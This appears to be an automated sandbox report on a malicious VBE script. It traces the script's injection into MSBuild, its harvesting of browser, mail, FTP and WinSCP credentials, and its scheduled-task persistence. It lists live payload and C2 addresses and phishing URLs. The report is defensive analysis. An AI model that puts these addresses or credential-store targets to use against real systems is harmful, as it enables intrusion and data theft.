Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: EE9008
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "7836" "2812" "2804" "2144" "0" "0" "1284" "0" "0" "0" "0" "0"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information
Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 15.2.MSBuild.exe.1000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000002.2508931005.0000000002F8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2508931005.0000000002F94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2505099429.0000000001002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2508931005.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 8124, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match | File source: 15.2.MSBuild.exe.1000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000002.2505099429.0000000001002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2508931005.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 8124, type: MEMORYSTR

Remote Access Functionality
Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 15.2.MSBuild.exe.1000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000002.2508931005.0000000002F8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2508931005.0000000002F94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2505099429.0000000001002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2508931005.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 8124, type: MEMORYSTR
MITRE ATT&CK Matrix (number before a technique = count of matching signatures; one row per matrix row, columns separated by "|")

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 311 Scripting | Valid Accounts | 121 Windows Management Instrumentation | 311 Scripting | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 2 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 311 Process Injection | 1 Obfuscated Files or Information | 1 Credentials in Registry | 24 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 2 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 1 DLL Side-Loading | Security Account Manager | 111 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Masquerading | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 141 Virtualization/Sandbox Evasion | LSA Secrets | 141 Virtualization/Sandbox Evasion | SSH | Keylogging | 23 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 311 Process Injection | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Behavior Graph ID: 1590535 | Sample: 009.vbe | Startdate: 14/01/2025 | Architecture: WINDOWS | Score: 100

Start (node 2)
  DNS: time.windows.com; bg.microsoft.map.fastly.net; api.ipify.org
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 7 other signatures
  Started: wscript.exe (node 8); wscript.exe (node 11); wscript.exe (node 15)

wscript.exe (node 8)
  Signatures: Wscript starts Powershell (via cmd or directly); Windows Scripting host queries suspicious COM object (likely to drop second stage)
  Started: powershell.exe (node 17)

wscript.exe (node 11)
  Network: 144.91.79.54, ports 49699, 49700, 80 (CONTABODE, Germany)
  Dropped: C:\Users\user\AppData\...\bEvujIIdkyIbOgF.vbs, ASCII
  Signatures: System process connects to network (likely due to code injection or exploit); Potential evasive VBS script found (sleep loop); Windows Shell Script Host drops VBS files; Suspicious execution chain found

powershell.exe (node 17)
  Signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes
  Started: MSBuild.exe (node 20); wermgr.exe (node 24); conhost.exe (node 26)

MSBuild.exe (node 20)
  Network: 162.254.34.31, ports 49972, 587 (VIVIDHOSTINGUS, United States); api.ipify.org 104.26.12.205, ports 443, 49970 (CLOUDFLARENETUS, United States)
  Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to steal Mail credentials (via file / registry access); 2 other signatures

Source | Detection | Scanner | Label
009.vbe | 2% | Virustotal | -
009.vbe | 0% | ReversingLabs | -
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://144.91.79.54/2412/sX | 0% | Avira URL Cloud | safe
http://144.91.79.54/2412/r | 0% | Avira URL Cloud | safe
http://144.91.79.54/2412/ssceg | 0% | Avira URL Cloud | safe
http://144.91.79.54/2412/dl2xgIbUbOo3ZqLShxJX.txtU?E | 0% | Avira URL Cloud | safe
http://144.91.79.54/412/r | 0% | Avira URL Cloud | safe
http://144.91.79.54/2412/v | 0% | Avira URL Cloud | safe
http://144.91.79.54:80/2412/dl2xgIbUbOo3ZqLShxJX.txt | 0% | Avira URL Cloud | safe
http://144.91.79.54/2412/s | 0% | Avira URL Cloud | safe
http://144.91.79.54/Zs | 0% | Avira URL Cloud | safe
http://144.91.79.54/2412/r&s | 0% | Avira URL Cloud | safe
http://144.91.79.54 | 0% | Avira URL Cloud | safe
http://144.91.79.54:80/2412/v | 0% | Avira URL Cloud | safe
http://144.91.79.54/2412/cn | 0% | Avira URL Cloud | safe
http://144.91.79.54/2412/file | 0% | Avira URL Cloud | safe
http://144.91.79.54/2412/r4C | 0% | Avira URL Cloud | safe
http://144.91.79.54:80/2412/sPH | 0% | Avira URL Cloud | safe
http://144.91.79.54/rs | 0% | Avira URL Cloud | safe
http://144.91.79.54/ | 0% | Avira URL Cloud | safe
http://144.91.79.54/6s | 0% | Avira URL Cloud | safe
http://144.bd060 | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | - | high
s-part-0017.t-0009.t-msedge.net | 13.107.246.45 | true | false | - | high
api.ipify.org | 104.26.12.205 | true | false | - | high
time.windows.com | unknown | unknown | false | - | high

Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | - | high

Name | Source | Malicious | Antivirus Detection | Reputation
http://144.91.79.54/2412/sX | wscript.exe, 00000000.00000003.1263929463.000001B4FBF56000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://144.91.79.54/2412/v | wscript.exe, 00000000.00000003.1297880876.000001B4FDC8F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1296994156.000001B4FDC8B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1300343179.000001B4FDC90000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://144.91.79.54/2412/s | wscript.exe, 00000000.00000003.1263929463.000001B4FBF56000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://account.dyn.com/ | MSBuild.exe, 0000000F.00000002.2505099429.0000000001002000.00000040.00000400.00020000.00000000.sdmp | false | - | high
http://144.91.79.54/2412/r | wscript.exe, 00000000.00000003.1277534356.000001B4FBFA6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://144.91.79.54/412/r | wscript.exe, 00000000.00000003.1274037561.000001B4FBFB9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://144.91.79.54/2412/ssceg | wscript.exe, 00000000.00000003.1263929463.000001B4FBF56000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://144.91.79.54/Zs | wscript.exe, 00000000.00000003.1274037561.000001B4FBFB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1264311503.000001B4FBFB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1263533043.000001B4FBFBC000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://144.91.79.54:80/2412/dl2xgIbUbOo3ZqLShxJX.txt | wscript.exe, 00000000.00000003.1297255452.000001B4FBF6F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1297767915.000001B4FBF70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1299612461.000001B4FBF70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1297232057.000001B4FBF5E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://144.91.79.54/2412/dl2xgIbUbOo3ZqLShxJX.txtU?E | wscript.exe, 00000000.00000003.1297309774.000001B4FBFF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1296199617.000001B4FBFEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1296279117.000001B4FBFF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1296973299.000001B4FBFEF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://144.91.79.54/2412/r&s | wscript.exe, 00000000.00000003.1274037561.000001B4FBFB9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://144.91.79.54:80/2412/v | wscript.exe, 00000000.00000003.1297255452.000001B4FBF6F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1297767915.000001B4FBF70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1299612461.000001B4FBF70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1297232057.000001B4FBF5E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.ipify.org/t | MSBuild.exe, 0000000F.00000002.2508931005.0000000002F11000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://144.91.79.54 | wscript.exe, 00000000.00000003.1263929463.000001B4FBF56000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://144.91.79.54/6s | wscript.exe, 00000000.00000003.1264311503.000001B4FBFB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1263533043.000001B4FBFBC000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.ipify.org | MSBuild.exe, 0000000F.00000002.2508931005.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.2505099429.0000000001002000.00000040.00000400.00020000.00000000.sdmp | false | - | high
http://144.91.79.54/rs | wscript.exe, 00000000.00000003.1274037561.000001B4FBFB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1263533043.000001B4FBFBC000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://144.91.79.54/2412/file | wscript.exe, 00000000.00000003.1297880876.000001B4FDC8F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1288515705.000001B4FDC81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1296994156.000001B4FDC8B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1300343179.000001B4FDC90000.00000004.00000020.00020000.00000000.sdmp | false
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://144.91.79.54/2412/cnwscript.exe, 00000000.00000003.1297880876.000001B4FDC8F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1288515705.000001B4FDC81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1296994156.000001B4FDC8B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1300343179.000001B4FDC90000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://144.91.79.54/wscript.exe, 00000000.00000003.1263533043.000001B4FBFBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1298744247.000001B4FC015000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1300122294.000001B4FC01B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1297980853.000001B4FC00F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1297309774.000001B4FBFF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://144.91.79.54/2412/r4Cwscript.exe, 00000000.00000003.1273950809.000001B4FBFDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://144.91.79.54:80/2412/sPHwscript.exe, 00000000.00000003.1263929463.000001B4FBF7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMSBuild.exe, 0000000F.00000002.2508931005.0000000002F11000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://144.bd060wscript.exe, 00000000.00000003.1263929463.000001B4FBF56000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
144.91.79.54 | unknown | Germany | 51167 | CONTABODE | true
104.26.12.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
162.254.34.31 | unknown | United States | 64200 | VIVIDHOSTINGUS | true
                                    Joe Sandbox version:42.0.0 Malachite
                                    Analysis ID:1590535
                                    Start date and time:2025-01-14 08:46:10 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 5m 40s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:20
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:009.vbe
                                    Detection:MAL
                                    Classification:mal100.spre.troj.spyw.expl.evad.winVBE@10/12@2/3
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 66
                                    • Number of non-executed functions: 6
                                    Cookbook Comments:
                                    • Found application associated with file extension: .vbe
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 51.137.137.111, 172.202.163.200, 2.22.50.144, 2.22.50.131, 20.3.187.198, 13.85.23.206, 20.190.160.22, 40.126.32.138, 40.126.32.140, 40.126.32.72, 40.126.32.68, 20.190.160.17, 40.126.32.136, 40.126.32.76, 104.208.16.94, 13.107.246.45
                                    • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.afd.azureedge.net, twc.trafficmanager.net, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, login.msa.msidentity.com, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, login.live.com, glb.cws.prod.dcat.dsp.trafficmanager.net, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net, onedsblobprdcus16.centralus.cloudapp.azure.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtCreateKey calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
02:47:09 | API Interceptor | 11x Sleep call for process: wscript.exe modified
04:11:04 | API Interceptor | 34x Sleep call for process: powershell.exe modified
04:11:10 | API Interceptor | 17x Sleep call for process: MSBuild.exe modified
04:11:26 | API Interceptor | 1x Sleep call for process: wermgr.exe modified
08:47:11 | Task Scheduler | Run new task: bEvujIIdkyIbOgF path: C:\Users\user\AppData\Roaming\bEvujIIdkyIbOgF.vbs
Match | Associated Sample Name / URL | Detection | Threat Name | Context
144.91.79.54 | Ref#501032.vbe | malicious | MassLogger RAT | 144.91.79.54/1211/file
144.91.79.54 | Ref#150062.vbe | malicious | MassLogger RAT | 144.91.79.54/1211/file
144.91.79.54 | BankInformation.vbe | malicious | AgentTesla | 144.91.79.54/1211/file
144.91.79.54 | Ref#2073306.vbe | malicious | MicroClip | 144.91.79.54/0911/file
144.91.79.54 | SWIFTCOPY202973783.vbe | malicious | AgentTesla | 144.91.79.54/0911/file
144.91.79.54 | Ref#130709.vbe | malicious | MassLogger RAT | 144.91.79.54/0911/file
144.91.79.54 | MV EAGLE EYE RFQ-92008882920-PDF.vbs | malicious | Unknown | 144.91.79.54/2210/file
144.91.79.54 | Urgent Quotation documents One Pdf.vbs | malicious | AgentTesla | 144.91.79.54/2210/file
144.91.79.54 | Chronopost_FormulaireAdresse.vbs | malicious | AsyncRAT | 144.91.79.54/2210/file
144.91.79.54 | Ref#150689.vbe | malicious | AgentTesla | 144.91.79.54/1210/file
104.26.12.205 | Yoranis Setup.exe | malicious | Unknown | api.ipify.org/
104.26.12.205 | RtU8kXPnKr.exe | malicious | Quasar | api.ipify.org/
104.26.12.205 | jgbC220X2U.exe | malicious | Unknown | api.ipify.org/?format=text
104.26.12.205 | xKvkNk9SXR.exe | malicious | TrojanRansom | api.ipify.org/
104.26.12.205 | GD8c7ARn8q.exe | malicious | TrojanRansom | api.ipify.org/
104.26.12.205 | 8AbMCL2dxM.exe | malicious | RCRU64, TrojanRansom | api.ipify.org/
104.26.12.205 | Simple2.exe | malicious | Unknown | api.ipify.org/
104.26.12.205 | Ransomware Mallox.exe | malicious | Targeted Ransomware | api.ipify.org/
104.26.12.205 | Yc9hcFC1ux.exe | malicious | Unknown | api.ipify.org/
104.26.12.205 | 6706e721f2c06.exe | malicious | Remcos | api.ipify.org/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
s-part-0017.t-0009.t-msedge.net | http://bebizicon.com/Campususa/index.xml#?email=b2xpdmllci5kb3phdEBpbm5vY2FwLmNvbQ== | malicious | EvilProxy, HTMLPhisher | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://iyztciuamr.cfolks.pl/pp | malicious | Unknown | 13.107.246.45
